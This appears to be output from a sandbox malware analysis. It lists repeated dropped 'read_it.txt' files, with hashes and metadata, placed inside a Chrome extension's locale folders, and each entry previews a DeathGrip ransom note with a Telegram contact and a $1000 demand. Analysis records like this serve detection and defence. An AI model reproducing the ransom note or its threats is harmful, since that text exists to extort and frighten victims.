                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
